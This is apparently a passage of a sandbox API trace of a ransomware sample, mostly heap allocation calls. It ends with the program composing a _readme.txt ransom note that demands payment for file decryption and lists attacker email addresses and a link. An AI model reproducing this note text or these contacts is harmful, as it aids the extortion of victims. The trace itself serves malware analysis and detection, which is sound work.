lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.876] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.876] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0183.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.877] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.877] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.878] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.878] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.879] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.879] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.880] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.880] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.881] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.881] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.882] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.882] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.883] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.883] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.884] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.884] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.885] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.885] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.886] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.886] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.887] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.887] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.888] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.888] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.889] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.889] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.890] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.890] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.891] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.891] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.892] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.893] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.893] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.894] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.894] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.895] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.895] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.896] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.896] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.897] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.897] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.898] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.898] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.899] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.899] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.900] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.900] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0183.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.901] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.901] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0183.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.902] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.902] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0183.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0183.903] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.903] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0183.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.904] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.904] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0183.905] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0183.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0183.905] PathFindFileNameW (pszPath="C:\\Boot\\Fonts\\") returned="Fonts\\" [0183.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.905] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0183.905] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.905] PathFindFileNameW (pszPath="") returned="" [0183.905] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0183.905] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0183.906] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0183.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0183.906] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0183.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0183.906] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0183.906] PathAppendW (in: pszPath="C:\\Boot\\Fonts\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 1 [0183.906] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0183.906] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0183.906] PathFileExistsW (pszPath="C:\\Boot\\Fonts\\_readme.txt") returned 0 [0183.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0183.910] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0183.910] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0183.910] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0183.910] CreateFileW (lpFileName="C:\\Boot\\Fonts\\_readme.txt" (normalized: "c:\\boot\\fonts\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0183.911] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 